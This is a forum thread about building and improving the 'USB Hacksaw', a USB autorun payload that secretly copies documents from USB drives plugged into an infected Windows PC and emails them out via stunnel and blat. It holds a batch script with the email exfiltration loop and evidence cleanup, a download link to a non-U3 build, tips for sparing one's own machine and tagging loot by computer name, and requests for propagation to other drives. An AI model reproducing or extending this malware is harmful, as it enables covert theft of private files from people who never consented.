Jump to content

USB Hacksaw Development


Darren Kitchen

Recommended Posts

Released on HAK.5 Episode 2x03 -- The USB Hacksaw is an evolution of the popular USB Switchblade that uses a modified version of USBDumper, Blat, Stunnel, and Gmail to automatically infect Windows PCs with a payload that will retriev documents from USB drives plugged into the target machine and securely transmit them to an email account. Proof of concept code shows how to deliver the payload instantly with a U3 autorun hack borrowed from the USB Switchblade on Windows 2000 or higher computers running as administrator or guest. Automatic propogation to other USB devices is possible however was not shown on Episode 2x03.

More in the show notes here:

http://www.hak5.org/wiki/USB_Hacksaw

Link to comment
Share on other sites

  • Replies 148
  • Created
  • Last Reply

Top Posters In This Topic

to fix all those ulgy blat commands in the send.bat file replace with one cleaner line useing the for command.

:: Configure Email Options

SET emailfrom=

SET emailto=

SET password=



:: Archive documents in 1MB chunks

rar a goodies.rar .docs -v1024k -vn

stunnel-4.11.exe -install -quiet

net start stunnel

GOTO badhack



:cleanup

:: Stop stunnel

rem taskkill /f /im stunnel-4.11.exe (??)

net stop stunnel

stunnel-4.11.exe -uninstall -quiet

:: Delete documents

rmdir /s /q docs

:: Delete archive

del /q /f goodies*.*

GOTO end



:badhack

REM Damn this is crude. Welcome to sleepless, I don't give a rats ass, just work damnit, hacking kids!

REM See show notes at http://www.hak5.org/wiki/USB_Hacksaw for a better method to do this. I'm not proud of it.



for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099



GOTO cleanup

:end

Link to comment
Share on other sites

A couple of questions

Is there a way to make this a timed thing?

example: Insert drive on monday and have it antidote itself Friday, or maybe just run until the computer gets restarted.

everytime the payload gets run I recieve the file in Gmail but when I try to open it, I get an error the file is unknown format or currupt. Anyone else getting this?

Is there a way to make the payload NOT run on my Hacksaw? Everytime I insert my hacksaw into my computer it copies my entire payload and tries to send it. We need a way to run the payload and get it copied to the hard drive and have the payload run the next time a usb is inserted.

Any ideas?

Link to comment
Share on other sites

A couple of questions

Is there a way to make this a timed thing?

example: Insert drive on monday and have it antidote itself Friday, or maybe just run until the computer gets restarted.

everytime the payload gets run I recieve the file in Gmail but when I try to open it, I get an error the file is unknown format or currupt. Anyone else getting this?

Is there a way to make the payload NOT run on my Hacksaw? Everytime I insert my hacksaw into my computer it copies my entire payload and tries to send it. We need a way to run the payload and get it copied to the hard drive and have the payload run the next time a usb is inserted.

Any ideas?

for development and testing purposes I've included an uninstaller in the antidote directory. Also hold the shift key while inserting your usb drive to have it not infect your system again. but no, the sbs.exe will rip the contents of a removeable drive regardless. obviously the code can be changed to only copy certain files, etc.

Link to comment
Share on other sites

The problem that I was refering to aardwolf is when I infect a computer for the first time it copies my wip folder and sends that to myself. Is there a setting to exclude certain folders on a usb? If so just ignore wip and my problem is solved.

Also you mention there is a way to only grab certaing types of documents, how is that set up?

Link to comment
Share on other sites

I added the Hacksaw payload to my Switchblade so here's what I did and how I protect myself:

1. copied SBS to CMD folder as required

2. created a hacksaw.bat with the go.cmd from the hacksaw payload

3. added <call hacksaw.bat> to the top of the Switchblade go.cmd

4. to protect my personal computer I created a file called test.txt at c:test.txt

5. in the hacksaw.bat I added this line to the top

if exist c:test.txt goto end

and created the :end tag at the bottom.

This not only adds Hacksaw to Switchblade but also protects your personal computer from infection while using your own .

One thing I would like to add still is some kind of delay on running sbs.exe. Is there a way to get system time, then add say 5-15 minutes, then have sbs execute? that would get rid of sending your own Hacksaw program to yourself.

Link to comment
Share on other sites

This just keeps getting scarier. If you now take the code used for "podslurping" you can run a routine that searches for all Excel files, PDF documents, Word docs etc and email those off as well.

To get really blackhat it would not take much to then also automatically run these security applications that run off of a USB drive:

http://www.watchyourend.com/2006/03/22/por...on-a-usb-drive/

And email the results off scans outside the network.

Link to comment
Share on other sites

How can i use ahmish's version of this.... do i go to the switchblade and just replace the files with these?

unfortunately no tht wont work correctly and even wen modding it a lil it still tends to hide ure files in the maindir of yer stick and make em systemfiles for some reason ....

Link to comment
Share on other sites

Well that would be a good thing. Im going to try and edit it and see what I can do. In the episode they said it was possible. Ill see what I come up with.
it is but the problem is it will only work if u autorun the go directly

ifu do it thru nircmd in ure maindir it will copy ure maindir to that folder instead of the needed files ....

ifu do cal the go.cmd directly its obviously visible ...

i'm gonna try n see if i can make a silent installer wich first copy's the files to a windows directory adn then runs the go.cmd invisible (if possible)

i did something similar b4 but tht was only useing cmd's and ftp's ...

ps anyone thought bout making it uber tiny by just useing a cmd and ftp file + nircmd

that way u can just have those placed on his hdd , connnect to a ftp dload the files needed , delete itself and run . (a tactic i use @ school for a lot of stuff cos they block web acces but i can still acces my ftp thru commandline)

Link to comment
Share on other sites

Well I did it.

So here....

http://www.fileden.com/files/2006/7/8/1164...cksaw_NonU3.rar

NonU3 working.

Just obviously copy this to the root of your drive.

I upped the file size of the rar's to 10m because i dont want a bunch of little 1mb files in my inbox. I also renamed googies to BackUp.

I'm wondering what the cmd option is to enter in the computer name....

like %appdata% gives the link to appdata.

I know theres one for the computer name aswell. I'd like this to attach it to the filename of the rar'd files. So I can determine where it came from. I'd also like the ones for date and time.

Cheers kids.

Link to comment
Share on other sites

Well I did it.

So here....

http://www.fileden.com/files/2006/7/8/1164...cksaw_NonU3.rar

NonU3 working.

Just obviously copy this to the root of your drive.

I upped the file size of the rar's to 10m because i dont want a bunch of little 1mb files in my inbox. I also renamed googies to BackUp.

I'm wondering what the cmd option is to enter in the computer name....

like %appdata% gives the link to appdata.

I know theres one for the computer name aswell. I'd like this to attach it to the filename of the rar'd files. So I can determine where it came from. I'd also like the ones for date and time.

Cheers kids.

that would be %computername%

Link to comment
Share on other sites

Hi ppl. Thankz for the nonU3usb chainsaw it came really handy.

Since its my first post I'll go nice and smooth :).

A minor correction at Jesu's code: you left the del goodies part instead of BackUp so that's it.

The correct code would be : WIPSBSsend.bat

:: Delete archive

del /q /f BackUp*.*

GOTO end

Futhermore, I'm having problems with it. The first time it backed up and sent me the email but the thing is that it wont do it again. I'm trying to figure it out so if you think of something feel free to inform me.

Peace out. :)

Link to comment
Share on other sites

ok - my one concern here (and i havent tried it yet), but what would happen if someone came along with either an ipod or a portable HDD or something with say, 60Gb of data. I'm assuming it would read it in the same way it reads a flash drive and attempt to copy and email it off, but it would take more than a few seconds to copy over 60+ GB of data, even longer to email it off, and then theres the problem of the 2ish GB limit on Gmail.

Link to comment
Share on other sites

ok - my one concern here (and i havent tried it yet), but what would happen if someone came along with either an ipod or a portable HDD or something with say, 60Gb of data. I'm assuming it would read it in the same way it reads a flash drive and attempt to copy and email it off, but it would take more than a few seconds to copy over 60+ GB of data, even longer to email it off, and then theres the problem of the 2ish GB limit on Gmail.

Filter volume by used space, or filter the volume's directory-tree based on target file extension(s) and size.

Link to comment
Share on other sites

Was wondering how this code could be modified to once a machine is infected to be copied back to any usb drive and infect it with the same payload, also if so and say that's the scenario. Who knows what usb drive will be plugged in and if it will be non-u3 or u3 and also if that's the case what about digital card reader's connected via usb and other usb media?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...